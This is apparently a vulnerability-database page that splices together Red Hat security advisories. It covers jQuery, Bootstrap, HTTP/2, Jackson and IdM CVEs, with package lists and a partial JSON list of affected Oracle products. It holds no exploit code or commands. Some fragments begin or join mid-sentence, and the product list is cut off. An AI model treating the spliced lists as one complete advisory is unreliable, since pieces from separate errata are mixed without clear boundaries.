- Upgrade sshd-common in Elytron from 2.7.0 to 2.9.2 JBEAP-24426 - (7.4.z) Upgrade Elytron from 1.15.15.Final-redhat-00001 to 1.15.16.Final-redhat-00001 JBEAP-24427 - (7.4.z) Upgrade WildFly Core from 15.0.21.Final-redhat-00002 to 15.0.22.Final-redhat-00001
- Description:
Red Hat Fuse provides a small-footprint, flexible, open source enterprise service bus and integration platform. Red Hat A-MQ is a standards compliant messaging system that is tailored for use in mission critical applications. It includes bug fixes, which are documented in the patch notes accompanying the package on the download page. See the download link given in the references section below. Solution:
Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.
Installation instructions are located in the download section of the customer portal.
The References section of this erratum contains a download link (you must log in to download the update). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: idm:DL1 and idm:client security, bug fix, and enhancement update Advisory ID: RHSA-2020:4670-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2020:4670 Issue date: 2020-11-03 CVE Names: CVE-2015-9251 CVE-2016-10735 CVE-2018-14040 CVE-2018-14042 CVE-2018-20676 CVE-2018-20677 CVE-2019-8331 CVE-2019-11358 CVE-2020-1722 CVE-2020-11022 ==================================================================== 1. Summary:
An update for the idm:DL1 and idm:client modules is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64
- Description:
Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments.
The following packages have been upgraded to a later upstream version: ipa (4.8.7), softhsm (2.6.0), opendnssec (2.1.6). (BZ#1759888, BZ#1818765, BZ#1818877)
Security Fix(es):
-
js-jquery: Cross-site scripting via cross-domain ajax requests (CVE-2015-9251)
-
bootstrap: XSS in the data-target attribute (CVE-2016-10735)
-
bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute (CVE-2018-14040)
-
bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip (CVE-2018-14042)
-
bootstrap: XSS in the tooltip data-viewport attribute (CVE-2018-20676)
-
bootstrap: XSS in the affix configuration target property (CVE-2018-20677)
-
bootstrap: XSS in the tooltip or popover data-template attribute (CVE-2019-8331)
-
js-jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection (CVE-2019-11358)
-
jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method (CVE-2020-11022)
-
ipa: No password length restriction leads to denial of service (CVE-2020-1722)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.3 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests 1430365 - [RFE] Host-group names command rename 1488732 - fake_mname in named.conf is no longer effective 1585020 - Enable compat tree to provide information about AD users and groups on trust agents 1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute 1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip 1651577 - [WebUI] IPA Error 3007: RequirmentError" while adding members in "User ID overrides" tab 1668082 - CVE-2018-20676 bootstrap: XSS in the tooltip data-viewport attribute 1668089 - CVE-2018-20677 bootstrap: XSS in the affix configuration target property 1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute 1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute 1701233 - [RFE] support setting supported signature methods on the token 1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection 1746830 - Memory leak during search of idview overrides 1750893 - Memory leak when slapi-nis return entries retrieved from nsswitch 1751295 - When sync-repl is enabled, slapi-nis can deadlock during retrochanglog trimming 1757045 - IDM Web GUI / IPA web UI: the ID override operation doesn't work in GUI (it works only from CLI) 1759888 - Rebase OpenDNSSEC to 2.1 1768156 - ERR - schemacompat - map rdlock: old way MAP_MONITOR_DISABLED 1777806 - When Service weight is set as 0 for server in IPA location "IPA Error 903: InternalError" is displayed 1793071 - CVE-2020-1722 ipa: No password length restriction leads to denial of service 1801698 - [RFE] Changing default hostgroup is too easy 1802471 - SELinux policy for ipa-custodia 1809835 - RFE: ipa group-add-member: number of failed should also be emphasized 1810154 - RFE: ipa-backup should compare locally and globally installed server roles 1810179 - ipa-client-install should name authselect backups and restore to that at uninstall time 1813330 - ipa-restore does not restart httpd 1816784 - KRA install fails if all KRA members are Hidden Replicas 1818765 - [Rebase] Rebase ipa to 4.8.6+ 1818877 - [Rebase] Rebase to softhsm 2.6.0+ 1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method 1831732 - AVC avc: denied { dac_override } for comm="ods-enforcerd 1831935 - AD authentication with IdM against SQL Server 1832331 - [abrt] [faf] 389-ds-base: unknown function(): /usr/sbin/ns-slapd killed by 11 1833266 - [dirsrv] set 'nsslapd-enable-upgrade-hash: off' as this raises warnings 1834264 - BIND rebase: rebuild against new so version 1834909 - softhsm use-after-free on process exit 1845211 - Rebase bind-dyndb-ldap to 11.3 1845537 - IPA bind configuration issue 1845596 - ipa trust-add fails with 'Fetching domains from trusted forest failed' 1846352 - cannot issue certs with multiple IP addresses corresponding to different hosts 1846434 - Remove ipa-idoverride-memberof as superceded by ipa-server 4.8.7 1847999 - EPN does not ship its default configuration ( /etc/ipa/epn.conf ) in freeipa-client-epn 1849914 - FreeIPA - Utilize 256-bit AJP connector passwords 1851411 - ipa: typo issue in ipanthomedirectoryrive deffinition 1852244 - ipa-healthcheck inadvertently obsoleted in RHEL 8.2 1853263 - ipa-selinux package missing 1857157 - replica install failing with avc denial for custodia component 1858318 - AttributeError: module 'ssl' has no attribute 'SSLCertVerificationError' when upgrading ca-less ipa master 1859213 - AVC denial during ipa-adtrust-install --add-agents 1863079 - ipa-epn command displays 'exception: ConnectionRefusedError: [Errno 111] Connection refused' 1863616 - CA-less install does not set required permissions on KDC certificate 1866291 - EPN: enhance input validation 1866938 - ipa-epn fails to retrieve user data if some user attributes are not present 1868432 - Unhandled Python exception in '/usr/libexec/ipa/ipa-pki-retrieve-key' 1869311 - ipa trust-add fails with 'Fetching domains from trusted forest failed' 1870202 - File permissions of /etc/ipa/ca.crt differ between CA-ful and CA-less 1874015 - ipa hbacrule-add-service --hbacsvcs=sshd is not applied successfully for subdomain 1875348 - Valgrind reports a memory leak in the Schema Compatibility plugin. 1879604 - pkispawn logs files are empty
- Package List:
Red Hat Enterprise Linux AppStream (v. 8):
Source: bind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.src.rpm custodia-0.6.0-3.module+el8.1.0+4098+f286395e.src.rpm ipa-4.8.7-12.module+el8.3.0+8222+c1bff54a.src.rpm ipa-4.8.7-12.module+el8.3.0+8223+6212645f.src.rpm ipa-healthcheck-0.4-6.module+el8.3.0+7710+e2408ce4.src.rpm ipa-healthcheck-0.4-6.module+el8.3.0+7711+c4441980.src.rpm opendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.src.rpm python-jwcrypto-0.5.0-1.module+el8.1.0+4098+f286395e.src.rpm python-jwcrypto-0.5.0-1.module+el8.1.0+4107+4a66eb87.src.rpm python-kdcproxy-0.4-5.module+el8.2.0+4691+a05b2456.src.rpm python-qrcode-5.1-12.module+el8.1.0+4098+f286395e.src.rpm python-qrcode-5.1-12.module+el8.1.0+4107+4a66eb87.src.rpm python-yubico-1.3.2-9.module+el8.1.0+4098+f286395e.src.rpm python-yubico-1.3.2-9.module+el8.1.0+4107+4a66eb87.src.rpm pyusb-1.0.0-9.module+el8.1.0+4098+f286395e.src.rpm pyusb-1.0.0-9.module+el8.1.0+4107+4a66eb87.src.rpm slapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.src.rpm softhsm-2.6.0-3.module+el8.3.0+6909+fb33717d.src.rpm
aarch64: bind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.aarch64.rpm bind-dyndb-ldap-debuginfo-11.3-1.module+el8.3.0+6993+104f8db0.aarch64.rpm bind-dyndb-ldap-debugsource-11.3-1.module+el8.3.0+6993+104f8db0.aarch64.rpm ipa-client-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm ipa-client-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm ipa-client-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm ipa-client-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm ipa-client-epn-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm ipa-client-epn-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm ipa-client-samba-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm ipa-client-samba-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm ipa-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm ipa-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm ipa-debugsource-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm ipa-debugsource-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm ipa-server-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm ipa-server-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm ipa-server-trust-ad-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm ipa-server-trust-ad-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm opendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.aarch64.rpm opendnssec-debuginfo-2.1.6-2.module+el8.3.0+6580+328a3362.aarch64.rpm opendnssec-debugsource-2.1.6-2.module+el8.3.0+6580+328a3362.aarch64.rpm slapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.aarch64.rpm slapi-nis-debuginfo-0.56.5-4.module+el8.3.0+8222+c1bff54a.aarch64.rpm slapi-nis-debugsource-0.56.5-4.module+el8.3.0+8222+c1bff54a.aarch64.rpm softhsm-2.6.0-3.module+el8.3.0+6909+fb33717d.aarch64.rpm softhsm-debuginfo-2.6.0-3.module+el8.3.0+6909+fb33717d.aarch64.rpm softhsm-debugsource-2.6.0-3.module+el8.3.0+6909+fb33717d.aarch64.rpm softhsm-devel-2.6.0-3.module+el8.3.0+6909+fb33717d.aarch64.rpm
noarch: custodia-0.6.0-3.module+el8.1.0+4098+f286395e.noarch.rpm ipa-client-common-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm ipa-client-common-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm ipa-common-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm ipa-common-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm ipa-healthcheck-0.4-6.module+el8.3.0+7710+e2408ce4.noarch.rpm ipa-healthcheck-core-0.4-6.module+el8.3.0+7710+e2408ce4.noarch.rpm ipa-healthcheck-core-0.4-6.module+el8.3.0+7711+c4441980.noarch.rpm ipa-python-compat-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm ipa-python-compat-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm ipa-selinux-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm ipa-selinux-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm ipa-server-common-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm ipa-server-dns-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm python3-custodia-0.6.0-3.module+el8.1.0+4098+f286395e.noarch.rpm python3-ipaclient-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm python3-ipaclient-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm python3-ipalib-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm python3-ipalib-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm python3-ipaserver-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm python3-jwcrypto-0.5.0-1.module+el8.1.0+4098+f286395e.noarch.rpm python3-jwcrypto-0.5.0-1.module+el8.1.0+4107+4a66eb87.noarch.rpm python3-kdcproxy-0.4-5.module+el8.2.0+4691+a05b2456.noarch.rpm python3-pyusb-1.0.0-9.module+el8.1.0+4098+f286395e.noarch.rpm python3-pyusb-1.0.0-9.module+el8.1.0+4107+4a66eb87.noarch.rpm python3-qrcode-5.1-12.module+el8.1.0+4098+f286395e.noarch.rpm python3-qrcode-5.1-12.module+el8.1.0+4107+4a66eb87.noarch.rpm python3-qrcode-core-5.1-12.module+el8.1.0+4098+f286395e.noarch.rpm python3-qrcode-core-5.1-12.module+el8.1.0+4107+4a66eb87.noarch.rpm python3-yubico-1.3.2-9.module+el8.1.0+4098+f286395e.noarch.rpm python3-yubico-1.3.2-9.module+el8.1.0+4107+4a66eb87.noarch.rpm
ppc64le: bind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.ppc64le.rpm bind-dyndb-ldap-debuginfo-11.3-1.module+el8.3.0+6993+104f8db0.ppc64le.rpm bind-dyndb-ldap-debugsource-11.3-1.module+el8.3.0+6993+104f8db0.ppc64le.rpm ipa-client-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm ipa-client-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm ipa-client-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm ipa-client-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm ipa-client-epn-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm ipa-client-epn-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm ipa-client-samba-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm ipa-client-samba-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm ipa-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm ipa-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm ipa-debugsource-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm ipa-debugsource-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm ipa-server-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm ipa-server-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm ipa-server-trust-ad-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm ipa-server-trust-ad-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm opendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.ppc64le.rpm opendnssec-debuginfo-2.1.6-2.module+el8.3.0+6580+328a3362.ppc64le.rpm opendnssec-debugsource-2.1.6-2.module+el8.3.0+6580+328a3362.ppc64le.rpm slapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.ppc64le.rpm slapi-nis-debuginfo-0.56.5-4.module+el8.3.0+8222+c1bff54a.ppc64le.rpm slapi-nis-debugsource-0.56.5-4.module+el8.3.0+8222+c1bff54a.ppc64le.rpm softhsm-2.6.0-3.module+el8.3.0+6909+fb33717d.ppc64le.rpm softhsm-debuginfo-2.6.0-3.module+el8.3.0+6909+fb33717d.ppc64le.rpm softhsm-debugsource-2.6.0-3.module+el8.3.0+6909+fb33717d.ppc64le.rpm softhsm-devel-2.6.0-3.module+el8.3.0+6909+fb33717d.ppc64le.rpm
s390x: bind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.s390x.rpm bind-dyndb-ldap-debuginfo-11.3-1.module+el8.3.0+6993+104f8db0.s390x.rpm bind-dyndb-ldap-debugsource-11.3-1.module+el8.3.0+6993+104f8db0.s390x.rpm ipa-client-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm ipa-client-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm ipa-client-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm ipa-client-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm ipa-client-epn-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm ipa-client-epn-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm ipa-client-samba-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm ipa-client-samba-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm ipa-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm ipa-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm ipa-debugsource-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm ipa-debugsource-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm ipa-server-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm ipa-server-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm ipa-server-trust-ad-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm ipa-server-trust-ad-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm opendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.s390x.rpm opendnssec-debuginfo-2.1.6-2.module+el8.3.0+6580+328a3362.s390x.rpm opendnssec-debugsource-2.1.6-2.module+el8.3.0+6580+328a3362.s390x.rpm slapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.s390x.rpm slapi-nis-debuginfo-0.56.5-4.module+el8.3.0+8222+c1bff54a.s390x.rpm slapi-nis-debugsource-0.56.5-4.module+el8.3.0+8222+c1bff54a.s390x.rpm softhsm-2.6.0-3.module+el8.3.0+6909+fb33717d.s390x.rpm softhsm-debuginfo-2.6.0-3.module+el8.3.0+6909+fb33717d.s390x.rpm softhsm-debugsource-2.6.0-3.module+el8.3.0+6909+fb33717d.s390x.rpm softhsm-devel-2.6.0-3.module+el8.3.0+6909+fb33717d.s390x.rpm
x86_64: bind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.x86_64.rpm bind-dyndb-ldap-debuginfo-11.3-1.module+el8.3.0+6993+104f8db0.x86_64.rpm bind-dyndb-ldap-debugsource-11.3-1.module+el8.3.0+6993+104f8db0.x86_64.rpm ipa-client-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm ipa-client-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm ipa-client-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm ipa-client-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm ipa-client-epn-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm ipa-client-epn-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm ipa-client-samba-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm ipa-client-samba-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm ipa-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm ipa-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm ipa-debugsource-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm ipa-debugsource-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm ipa-server-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm ipa-server-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm ipa-server-trust-ad-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm ipa-server-trust-ad-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm opendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.x86_64.rpm opendnssec-debuginfo-2.1.6-2.module+el8.3.0+6580+328a3362.x86_64.rpm opendnssec-debugsource-2.1.6-2.module+el8.3.0+6580+328a3362.x86_64.rpm slapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.x86_64.rpm slapi-nis-debuginfo-0.56.5-4.module+el8.3.0+8222+c1bff54a.x86_64.rpm slapi-nis-debugsource-0.56.5-4.module+el8.3.0+8222+c1bff54a.x86_64.rpm softhsm-2.6.0-3.module+el8.3.0+6909+fb33717d.x86_64.rpm softhsm-debuginfo-2.6.0-3.module+el8.3.0+6909+fb33717d.x86_64.rpm softhsm-debugsource-2.6.0-3.module+el8.3.0+6909+fb33717d.x86_64.rpm softhsm-devel-2.6.0-3.module+el8.3.0+6909+fb33717d.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-9251 https://access.redhat.com/security/cve/CVE-2016-10735 https://access.redhat.com/security/cve/CVE-2018-14040 https://access.redhat.com/security/cve/CVE-2018-14042 https://access.redhat.com/security/cve/CVE-2018-20676 https://access.redhat.com/security/cve/CVE-2018-20677 https://access.redhat.com/security/cve/CVE-2019-8331 https://access.redhat.com/security/cve/CVE-2019-11358 https://access.redhat.com/security/cve/CVE-2020-1722 https://access.redhat.com/security/cve/CVE-2020-11022 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBX6I0xtzjgjWX9erEAQioFw/+IiVoE8tPMkiNgSNrk05OezzG/Cev8wXY mTJ+clSxujruzDZ1GyYz5Ua5v4+fwEHbTKVHiite3HKbYGgV9E5H9Y/JVR75rbPN mIfAOLmvYDp3JeHT3RBqRrtviz2UaWRTmE8E30EoC0C912w0NHpwS3fhuRmJov1X lflTtWlQCuPE/7yFQEZqYYjmKMqAVeDk4K6smM/aTzMyM+uFgaksiSTrLzU0mcHJ AAn9h59qlwUXNGRbyBCoLMJrKq5Sw1+xz518XIIjJOQDJbSqu8syzKgi/qSFuLRp 2c/OSKJ98CVoiCcyhsBW/c3B6eoDmSfeKqt6JwVH/Sva+d7Oj5vpWTB5GW4hDFFh t3cuhvyavPnyAzxRnYw5syn/RTyjaOK1U6+6SbEtJVnlx9+FW0lKs/Pcx2ocYmfO UCDXHgxmEP8DTKwJZyIZtybVkpqbXh6jf69NLROTTZMtEwJzE1NGG4ulcl6tutTq S0gchuiUuxItZlD3a9ISBXXxV0iqqd7I5p78maohzIwfyZR13S++rFt7JnoVb7SO DECfEs6VinGH0Z0YInceF6Y9N+SURBrcQpQK12/wtGSChFFU83FII2sxy6iG7pTF HPTzByu+aYgFpuEF4EKSrDlZCVJ8Es5lyp+cF401o3oGJuNo9WYScKjb51a0+SLJ zbmM3GoiGZI=QyyK -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . The purpose of this text-only errata is to inform you about the security issues fixed in this release.
Security Fix(es):
-
HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512)
-
HTTP/2: flood using PRIORITY frames results in excessive resource consumption (CVE-2019-9513)
-
HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514)
-
HTTP/2: flood using SETTINGS frames results in unbounded memory growth (CVE-2019-9515)
-
HTTP/2: 0-length headers lead to denial of service (CVE-2019-9516)
-
HTTP/2: request for large response leads to denial of service (CVE-2019-9517)
-
HTTP/2: flood using empty frames results in excessive resource consumption (CVE-2019-9518)
-
infinispan: invokeAccessibly method from ReflectionUtil class allows to invoke private methods (CVE-2019-10174)
-
spring-security-core: mishandling of user passwords allows logging in with a password of NULL (CVE-2019-11272)
-
jackson-databind: failure to block the logback-core class from polymorphic deserialization leading to remote code execution (CVE-2019-12384)
-
jackson-databind: default typing mishandling leading to remote code execution (CVE-2019-14379)
-
xmlrpc: Deserialization of server-side exception from faultCause in XMLRPC error response (CVE-2019-17570)
-
js-jquery: Cross-site scripting via cross-domain ajax requests (CVE-2015-9251)
-
logback: Serialization vulnerability in SocketServer and ServerSocketReceiver (CVE-2017-5929)
-
js-jquery: XSS in responses from cross-origin ajax requests (CVE-2017-16012)
-
apache-commons-compress: ZipArchiveInputStream.read() fails to identify correct EOF allowing for DoS via crafted zip (CVE-2018-11771)
-
spring-data-api: potential information disclosure through maliciously crafted example value in ExampleMatcher (CVE-2019-3802)
-
undertow: leak credentials to log files UndertowLogger.REQUEST_LOGGER.undertowRequestFailed (CVE-2019-3888)
-
shiro: Cookie padding oracle vulnerability with default configuration (CVE-2019-12422)
-
jackson-databind: polymorphic typing issue allows attacker to read arbitrary local files on the server via crafted JSON message. 1725807 - CVE-2019-12384 jackson-databind: failure to block the logback-core class from polymorphic deserialization leading to remote code execution 1728993 - CVE-2019-11272 spring-security-core: mishandling of user passwords allows logging in with a password of NULL 1730316 - CVE-2019-3802 spring-data-api: potential information disclosure through maliciously crafted example value in ExampleMatcher 1735645 - CVE-2019-9512 HTTP/2: flood using PING frames results in unbounded memory growth 1735741 - CVE-2019-9513 HTTP/2: flood using PRIORITY frames results in excessive resource consumption 1735744 - CVE-2019-9514 HTTP/2: flood using HEADERS frames results in unbounded memory growth 1735745 - CVE-2019-9515 HTTP/2: flood using SETTINGS frames results in unbounded memory growth 1735749 - CVE-2019-9518 HTTP/2: flood using empty frames results in excessive resource consumption 1737517 - CVE-2019-14379 jackson-databind: default typing mishandling leading to remote code execution 1741864 - CVE-2019-9516 HTTP/2: 0-length headers lead to denial of service 1741868 - CVE-2019-9517 HTTP/2: request for large response leads to denial of service 1752962 - CVE-2019-14439 jackson-databind: Polymorphic typing issue related to logback/JNDI 1774726 - CVE-2019-12422 shiro: Cookie padding oracle vulnerability with default configuration 1775193 - CVE-2019-17570 xmlrpc: Deserialization of server-side exception from faultCause in XMLRPC error response
5
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201801-0036", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "weblogic server", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.2.1.3", }, { model: "weblogic server", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.1.3.0", }, { model: "service bus", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.2.1.3.0", }, { model: "service bus", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "retail workforce management software", scope: "eq", trust: 1.3, vendor: "oracle", version: "1.60.9", }, { model: "retail sales audit", scope: "eq", trust: 1.3, vendor: "oracle", version: "15.0", }, { model: "retail invoice matching", scope: "eq", trust: 1.3, vendor: "oracle", version: "15.0", }, { model: "retail customer insights", scope: "eq", trust: 1.3, vendor: "oracle", version: "16.0", }, { model: "retail customer insights", scope: "eq", trust: 1.3, vendor: "oracle", version: "15.0", }, { model: "retail allocation", scope: "eq", trust: 1.3, vendor: "oracle", version: "15.0.2", }, { model: "primavera unifier", scope: "eq", trust: 1.3, vendor: "oracle", version: "18.8", }, { model: "primavera unifier", scope: "eq", trust: 1.3, vendor: "oracle", version: "16.2", }, { model: "primavera unifier", scope: "eq", trust: 1.3, vendor: "oracle", version: "16.1", }, { model: "primavera gateway", scope: "eq", trust: 1.3, vendor: "oracle", version: "17.12", }, { model: "primavera gateway", scope: "eq", trust: 1.3, vendor: "oracle", version: "16.2", }, { model: "primavera gateway", scope: "eq", trust: 1.3, vendor: "oracle", version: "15.2", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 1.3, vendor: "oracle", version: "8.57", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 1.3, vendor: "oracle", version: "8.56", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 1.3, 